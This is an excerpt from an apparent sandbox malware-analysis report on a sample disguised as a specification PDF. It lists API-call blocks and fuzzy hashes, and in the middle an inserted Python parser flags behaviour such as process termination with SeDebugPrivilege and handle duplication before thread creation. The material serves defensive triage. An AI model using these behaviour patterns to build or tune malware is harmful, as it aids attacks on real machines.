                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: c52d07fe6d74e8509d3b1ed20e82efb9ebf8be07e71cb5c46a713a6f7ded9aa8
                                      • Instruction ID: 06d4b648be606e335f7d5e2adc09f6898ba37edf379119cb099d2df977f99a21
                                      • Opcode Fuzzy Hash: c52d07fe6d74e8509d3b1ed20e82efb9ebf8be07e71cb5c46a713a6f7ded9aa8
                                      • Instruction Fuzzy Hash: 3F41E47060C280DBD73F4B288D8DE6A7A9EAB41307F1A081DF98786D71D671BA48C311
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B26C
                                      • HeapAlloc.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B273
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B288
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B290
                                      • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B293
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B2A3
                                      • GetCurrentProcess.KERNEL32(0037AEF1,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AB
                                      • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AE
                                      • CreateThread.KERNEL32(00000000,00000000,0037B2D4,00000000,00000000,00000000), ref: 0037B2C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 93a5d16d1c19976c931772a9e4c21472a55ffe7dd6f0bc5956ec18ab4e20e494
                                      • Instruction ID: 4e953b330a22574a716e57b2115041de15c976722771aebc4e047e26440c4366
                                      • Opcode Fuzzy Hash: 93a5d16d1c19976c931772a9e4c21472a55ffe7dd6f0bc5956ec18ab4e20e494
                                      • Instruction Fuzzy Hash: D601C9B5240348BFE711AFA5DC4DF6B7BACEB88711F058425FA05DB1A1CA74E801CB61
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,00400312,00000104,00000000,00000001,00000000), ref: 003682B1
                                      • GetStdHandle.KERNEL32(000000F4,00000000,00000001,00000000), ref: 0036836B
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003683BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$HandleModuleNameWrite
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 3784150691-4022980321
                                      • Opcode ID: 5ec60939089c2adb7c22090b725db17e5bfa59cbbfcdc6327a04628a8b8f7293
                                      • Instruction ID: 3219c8537cba42af2c0ab7c75903a9813bd466dc91c0665979b82bd08366f8f6
                                      • Opcode Fuzzy Hash: 5ec60939089c2adb7c22090b725db17e5bfa59cbbfcdc6327a04628a8b8f7293
                                      • Instruction Fuzzy Hash: A1415979A402157AD72367685C56FEF325C9B0AB10F258239FC04F62CAEEB49E404299
                                      APIs
                                        • Part of subcall function 00386532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                        • Part of subcall function 00386532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                        • Part of subcall function 00386532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A179A
                                      • GetLastError.KERNEL32 ref: 003A17AD
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A17D9
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 003A1855
                                      • GetLastError.KERNEL32(00000000), ref: 003A1860
                                      • CloseHandle.KERNEL32(00000000), ref: 003A1895
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                      • Instruction ID: aacd65a432827568298e8bf195032dff39d469a5fe3427902f5ac52ff7c80a61
                                      • Opcode Fuzzy Hash: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                      • Instruction Fuzzy Hash: CC41E175600200AFDB07EF54CC95FAEB7A9EF45700F098098F9069F2D2DB79A904CB91
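The two function blocks above that matter most to a triage analyst are the one that duplicates handles to the current process and then calls CreateThread (GetProcessHeap / DuplicateHandle / CreateThread) and the one that enumerates processes with CreateToolhelp32Snapshot, opens a target with OpenProcess and calls TerminateProcess next to the string SeDebugPrivilege. The report lists these as flat bullet lines, so an analyst who wants to sweep many such blocks needs a parser. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code: it parses "APIs" blocks in exactly the line shape used on this page (including the "Part of subcall function" prefix and bullets such as GetLastError that carry no argument list), then checks each block for ordered API sequences and for an OpenProcess access mask that includes PROCESS_TERMINATE (0x1, a documented Win32 constant). The sample report text, the rule names and the rule set itself are constructed here for illustration; the report orders calls by code address, which approximates but does not prove runtime order.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample in the shape of the report's "APIs" blocks above
# (two function blocks, an empty "Strings" header and the next section header).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00386532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
  • Part of subcall function 00386532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A179A
• GetLastError.KERNEL32 ref: 003A17AD
• TerminateProcess.KERNEL32(00000000,00000000), ref: 003A1855
• CloseHandle.KERNEL32(00000000), ref: 003A1895
Strings
Memory Dump Source
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B26C
• DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B293
• CreateThread.KERNEL32(00000000,00000000,0037B2D4,00000000,00000000,00000000), ref: 0037B2C8
Memory Dump Source
"""

# One bullet of an "APIs" block. The "Part of subcall function" prefix and the
# argument list are both optional (GetLastError is listed without one).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

PROCESS_TERMINATE = 0x0001  # OpenProcess dwDesiredAccess bit (Win32 constant)

# Ordered API sequences worth an analyst's attention; names exactly as the
# report prints them. Rule names are this example's own, not Joe Sandbox's.
SEQUENCE_RULES = {
    "process enumeration then termination": ("CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"),
    "handle duplication then thread creation": ("DuplicateHandle", "CreateThread"),
    "child process creation": ("CreateProcessW",),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall: Optional[str]  # callee address when the call is inherited from a sub-function

    def arg_int(self, index: int) -> Optional[int]:
        """Numeric value of argument `index`, or None when the report shows '?' (unresolved)."""
        if index >= len(self.args) or self.args[index] == "?":
            return None
        return int(self.args[index], 16)


def parse_api_blocks(text: str) -> list[list[ApiCall]]:
    """Split report text into one list of ApiCall per "APIs" section, in report order."""
    blocks: list[list[ApiCall]] = []
    current: Optional[list[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m is None:
            current = None  # any non-API line ("Strings", "Memory Dump Source") ends the section
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return [b for b in blocks if b]


def contains_in_order(apis: list[str], required: tuple[str, ...]) -> bool:
    """True when every name in `required` appears in `apis`, in that relative order."""
    it = iter(apis)
    return all(any(name == want for name in it) for want in required)


def classify(block: list[ApiCall]) -> list[str]:
    """Rule names the block satisfies, followed by argument-level findings."""
    apis = [c.api for c in block]
    tags = [rule for rule, seq in SEQUENCE_RULES.items() if contains_in_order(apis, seq)]
    for call in block:
        # OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId): an access mask
        # containing 0x1 is the minimum needed to terminate another process.
        if call.api == "OpenProcess":
            access = call.arg_int(0)
            if access is not None and access & PROCESS_TERMINATE:
                tags.append("OpenProcess requests PROCESS_TERMINATE")
    return tags


def analyze(text: str) -> list[tuple[list[str], list[str]]]:
    """Pair each block's API sequence with its findings."""
    return [([c.api for c in b], classify(b)) for b in parse_api_blocks(text)]


if __name__ == "__main__":
    for apis, tags in analyze(SAMPLE_REPORT):
        print(" -> ".join(apis))
        for tag in tags:
            print("   !", tag)
```

Unresolved arguments ("?") are skipped rather than guessed, so an OpenProcess whose access mask the sandbox could not recover produces no PROCESS_TERMINATE finding; pair this static view with the report's runtime behaviour signatures before drawing conclusions.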
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A2688
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A26AC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A26EC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A270E
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003A286F
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003A28A1
                                      • CloseHandle.KERNEL32(?), ref: 003A28D0
                                      • CloseHandle.KERNEL32(?), ref: 003A2947
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
                                      • String ID:
                                      • API String ID: 2947177986-0
                                      • Opcode ID: 8f28098166dbba08418e870a91814e507d2b550c3b0c48bf0a13a2abbfd2406f
                                      • Instruction ID: 3b9d39897cb8be237bb81bbf5662472535fededceb440bc98ab40426541f0a3b
                                      • Opcode Fuzzy Hash: 8f28098166dbba08418e870a91814e507d2b550c3b0c48bf0a13a2abbfd2406f
                                      • Instruction Fuzzy Hash: 28D19E356043009FC716EF28C851A6ABBE5EF86310F15895DF8999F2A2DB31ED44CB52
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 003858B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                      • Instruction ID: cd4c58f2df22d6563bb6bec1ba97442e5ff6433f8dda4dd2da6fd2a1e6535985
                                      • Opcode Fuzzy Hash: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                      • Instruction Fuzzy Hash: 0011D63670DB46FAE7176B549C83DAB779C9F25724F2000BBF611FA281E7B0AA004765
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0038A806
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ArraySafeVartype
                                      • String ID:
                                      • API String ID: 1725837607-0
                                      • Opcode ID: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                      • Instruction ID: 5977617bff30cc6dcb5251928ca2f84f36160dde4de5abcffe1bb1a914fd2ea8
                                      • Opcode Fuzzy Hash: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                      • Instruction Fuzzy Hash: 26C1B175904709DFEB06EF94C481BAEB7F4FF08315F2440AAE605EB251D734AA46CB91
                                      APIs
                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2BF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharConnectRegistryUpper
                                      • String ID:
                                      • API String ID: 2595220575-0
                                      • Opcode ID: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                      • Instruction ID: 410f514dd05c71118c41fd6568d337f6bb0f0ebe393afd97f0927446f033f5a0
                                      • Opcode Fuzzy Hash: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                      • Instruction Fuzzy Hash: 76916B752042019FCB12EF58C891F6EB7E5FF89310F04885DF9A69B2A2DB34E945CB42
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 003A8EE4
                                      • GetDC.USER32(00000000), ref: 003A8EEC
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003A8EF7
                                      • ReleaseDC.USER32(00000000,00000000), ref: 003A8F03
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003A8F3F
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003A8F50
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003A8F8A
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003A8FAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                      • Instruction ID: b206bb6dbb6d188f0b53b1e9b5e8c75acc8f36745433df90ea34951723a39609
                                      • Opcode Fuzzy Hash: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                      • Instruction Fuzzy Hash: 4031AE72200214BFEB128F54DC4AFEB3BADEF4A715F054065FE48DA291CAB5A841CB70
                                      APIs
                                      • InterlockedDecrement.KERNEL32(?), ref: 0036704D
                                      • InterlockedDecrement.KERNEL32(00000000), ref: 00367058
                                      • InterlockedDecrement.KERNEL32(?), ref: 00367065
                                      • InterlockedDecrement.KERNEL32(00000000), ref: 00367070
                                      • InterlockedDecrement.KERNEL32(?), ref: 0036707D
                                      • InterlockedDecrement.KERNEL32(?), ref: 00367098
                                      • InterlockedDecrement.KERNEL32(00000000), ref: 003670AC
                                      • InterlockedDecrement.KERNEL32(?), ref: 003670C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: DecrementInterlocked
                                      • String ID:
                                      • API String ID: 3448037634-0
                                      • Opcode ID: 15e8d419d7d0beb2705db05ebfca7259a77d11d8f33eeaecf8751f04710f0f3a
                                      • Instruction ID: e9bc0dce0d471d8596aab8471f23d28cac7659b0cd6e18fdb7a28907ec030fc4
                                      • Opcode Fuzzy Hash: 15e8d419d7d0beb2705db05ebfca7259a77d11d8f33eeaecf8751f04710f0f3a
                                      • Instruction Fuzzy Hash: A3114C305006089BDB33AF29CC88BAAF7E8AF40748F96C42AE545D6164C775AC84CF70
                                      APIs
                                      • InterlockedIncrement.KERNEL32(00000000), ref: 00366E5B
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E66
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E73
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E7E
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E8B
                                      • InterlockedIncrement.KERNEL32(0000001C), ref: 00366EA6
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366EBA
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366ED4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IncrementInterlocked
                                      • String ID:
                                      • API String ID: 3508698243-0
                                      • Opcode ID: 15881d8e3dff222f0dcae298e9dd5d06752c97e70c766b775ae040b7c2978adf
                                      • Instruction ID: 6f17e560cfac103cee9c988bab1a0e951a136a35c25fa37b4f6278396cb5dae7
                                      • Opcode Fuzzy Hash: 15881d8e3dff222f0dcae298e9dd5d06752c97e70c766b775ae040b7c2978adf
                                      • Instruction Fuzzy Hash: F6112E35900619EBDB129F29CD89B9ABBE8FF04384F05C066E404C6564C775A8A4CFE0
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                      • Instruction ID: 1c0f68126f59e6148bdbbc5d388cf45ce5e7997e515cf6e73840af3e97706492
                                      • Opcode Fuzzy Hash: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                      • Instruction Fuzzy Hash: 3FE1F471A1021AAFDF16DFA8C881BEE77B9EF48354F158029F905AB281D770AD41CB90
                                      APIs
                                      • select.WSOCK32 ref: 00399691
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0039969E
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003996C8
                                       • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003996E9 (import by ordinal; ordinal 17 of WSOCK32 is recvfrom)
                                      • WSAGetLastError.WSOCK32(00000000), ref: 003996F8
                                      • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,003DDC00), ref: 00399765
                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 003997AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$htonsinet_ntoaselect
                                      • String ID:
                                      • API String ID: 500251541-0
                                      • Opcode ID: 28e65bfacda19ad029a036d5c08b60f2ba3ff10435b50e4c0b8bb422679a2d74
                                      • Instruction ID: 2354f77d48d2bc6033f7b350d303d5851c4dd50c062093944af94d9c77adf13b
                                      • Opcode Fuzzy Hash: 28e65bfacda19ad029a036d5c08b60f2ba3ff10435b50e4c0b8bb422679a2d74
                                      • Instruction Fuzzy Hash: F481B171504200ABC716EF69CC85F6BB7E8EF85714F104A1EF5559F1A1EB70E904CB92
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • GetSystemMetrics.USER32(0000000F), ref: 003B016D
                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003B038D
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003B03AB
                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003B03D6
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003B03FF
                                      • ShowWindow.USER32(00000003,00000000), ref: 003B0421
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 003B0440
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
